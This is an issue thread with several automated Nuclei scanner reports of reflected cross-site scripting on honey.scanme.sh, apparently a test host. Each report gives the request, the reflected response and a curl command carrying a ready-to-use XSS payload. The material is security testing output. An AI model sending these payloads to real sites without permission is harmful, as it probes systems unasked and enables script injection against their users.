search

mkrs2404 / tickets

0 stars 0 forks source link

Fuzzing Parameters - Cross-Site Scripting (xss-fuzz) found on honey.scanme.sh #54

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: xss-fuzz matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E

Timestamp: Tue Apr 30 19:28:55 +0530 IST 2024

Template Information

Key Value
Name Fuzzing Parameters - Cross-Site Scripting
Authors kazet
Tags xss, generic
Severity medium
Description Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
CWE-ID CWE-79
CVSS-Score 0.00
parameters q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year

Request

GET /?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 905
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:55 GMT

GET /?u='>"<svg/onload=confirm('xss-u')>&groups='>"<svg/onload=confirm('xss-groups')>&signup_for='>"<svg/onload=confirm('xss-signup_for')>&user_id='>"<svg/onload=confirm('xss-user_id')>&type='>"<svg/onload=confirm('xss-type')>&desc='>"<svg/onload=confirm('xss-desc')>&newcontent='>"<svg/onload=confirm('xss-newcontent')>&foo='>"<svg/onload=confirm('xss-foo')>&message='>"<svg/onload=confirm('xss-message')>&d='>"<svg/onload=confirm('xss-d')>&width='>"<svg/onload=confirm('xss-width')>&_wp_http_referer='>"<svg/onload=confirm('xss-_wp_http_referer')>&post_status='>"<svg/onload=confirm('xss-post_status')>&author='>"<svg/onload=confirm('xss-author')> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57

Extra Information

Metadata:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57' 'https://honey.scanme.sh/?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E'

Generated by Nuclei v3.2.5

mkrs2404 commented 4 months ago

Details: xss-fuzz matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E

Timestamp: Tue Apr 30 19:28:55 +0530 IST 2024

Template Information

Key Value
Name Fuzzing Parameters - Cross-Site Scripting
Authors kazet
Tags xss, generic
Severity medium
Description Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
CWE-ID CWE-79
CVSS-Score 0.00
parameters q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year

Request

GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 852
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:55 GMT

GET /?t='>"<svg/onload=confirm('xss-t')>&comment='>"<svg/onload=confirm('xss-comment')>&post_id='>"<svg/onload=confirm('xss-post_id')>&postid='>"<svg/onload=confirm('xss-postid')>&config='>"<svg/onload=confirm('xss-config')>&login='>"<svg/onload=confirm('xss-login')>&paged='>"<svg/onload=confirm('xss-paged')>&go='>"<svg/onload=confirm('xss-go')>&tag_ID='>"<svg/onload=confirm('xss-tag_ID')>&user_login='>"<svg/onload=confirm('xss-user_login')>&part='>"<svg/onload=confirm('xss-part')>&preview_id='>"<svg/onload=confirm('xss-preview_id')>&_ajax_nonce='>"<svg/onload=confirm('xss-_ajax_nonce')>&widget-id='>"<svg/onload=confirm('xss-widget-id')> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:40.0) Gecko/20100101 Firefox/40.0

Extra Information

Metadata:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:40.0) Gecko/20100101 Firefox/40.0' 'https://honey.scanme.sh/?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E'

Generated by Nuclei v3.2.5

mkrs2404 commented 4 months ago

Details: xss-fuzz matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E

Timestamp: Tue Apr 30 19:28:55 +0530 IST 2024

Template Information

Key Value
Name Fuzzing Parameters - Cross-Site Scripting
Authors kazet
Tags xss, generic
Severity medium
Description Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
CWE-ID CWE-79
CVSS-Score 0.00
parameters q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year

Request

GET /?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.04
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 846
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:55 GMT

GET /?title='>"<svg/onload=confirm('xss-title')>&view='>"<svg/onload=confirm('xss-view')>&context='>"<svg/onload=confirm('xss-context')>&passwd='>"<svg/onload=confirm('xss-passwd')>&count='>"<svg/onload=confirm('xss-count')>&delete='>"<svg/onload=confirm('xss-delete')>&test='>"<svg/onload=confirm('xss-test')>&hash='>"<svg/onload=confirm('xss-hash')>&csrf_token='>"<svg/onload=confirm('xss-csrf_token')>&o='>"<svg/onload=confirm('xss-o')>&activate='>"<svg/onload=confirm('xss-activate')>&edit='>"<svg/onload=confirm('xss-edit')>&ip='>"<svg/onload=confirm('xss-ip')>&r='>"<svg/onload=confirm('xss-r')> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.04

Extra Information

Metadata:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.04' 'https://honey.scanme.sh/?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E'

Generated by Nuclei v3.2.5

mkrs2404 commented 4 months ago

Details: xss-fuzz matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E

Timestamp: Tue Apr 30 19:28:55 +0530 IST 2024

Template Information

Key Value
Name Fuzzing Parameters - Cross-Site Scripting
Authors kazet
Tags xss, generic
Severity medium
Description Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
CWE-ID CWE-79
CVSS-Score 0.00
parameters q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year

Request

GET /?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4280.67 Safari/537.36 Edg/97.0.664.52
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 923
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:55 GMT

GET /?send='>"<svg/onload=confirm('xss-send')>&attachment_id='>"<svg/onload=confirm('xss-attachment_id')>&wp_screen_options='>"<svg/onload=confirm('xss-wp_screen_options')>&page_id='>"<svg/onload=confirm('xss-page_id')>&locale='>"<svg/onload=confirm('xss-locale')>&function='>"<svg/onload=confirm('xss-function')>&profile='>"<svg/onload=confirm('xss-profile')>&day='>"<svg/onload=confirm('xss-day')>&folder='>"<svg/onload=confirm('xss-folder')>&mobile='>"<svg/onload=confirm('xss-mobile')>&settings='>"<svg/onload=confirm('xss-settings')>&comments='>"<svg/onload=confirm('xss-comments')>&all='>"<svg/onload=confirm('xss-all')>&menu='>"<svg/onload=confirm('xss-menu')> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4280.67 Safari/537.36 Edg/97.0.664.52

Extra Information

Metadata:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4280.67 Safari/537.36 Edg/97.0.664.52' 'https://honey.scanme.sh/?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E'

Generated by Nuclei v3.2.5

mkrs2404 commented 4 months ago

Details: xss-fuzz matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E

Timestamp: Tue Apr 30 19:28:55 +0530 IST 2024

Template Information

Key Value
Name Fuzzing Parameters - Cross-Site Scripting
Authors kazet
Tags xss, generic
Severity medium
Description Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
CWE-ID CWE-79
CVSS-Score 0.00
parameters q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year

Request

GET /?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 848
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:55 GMT

GET /?tags='>"<svg/onload=confirm('xss-tags')>&e='>"<svg/onload=confirm('xss-e')>&users='>"<svg/onload=confirm('xss-users')>&format='>"<svg/onload=confirm('xss-format')>&dl='>"<svg/onload=confirm('xss-dl')>&position='>"<svg/onload=confirm('xss-position')>&url='>"<svg/onload=confirm('xss-url')>&theme='>"<svg/onload=confirm('xss-theme')>&firstname='>"<svg/onload=confirm('xss-firstname')>&fields='>"<svg/onload=confirm('xss-fields')>&form='>"<svg/onload=confirm('xss-form')>&level='>"<svg/onload=confirm('xss-level')>&month='>"<svg/onload=confirm('xss-month')>&oauth_verifier='>"<svg/onload=confirm('xss-oauth_verifier')> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

Extra Information

Metadata:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' 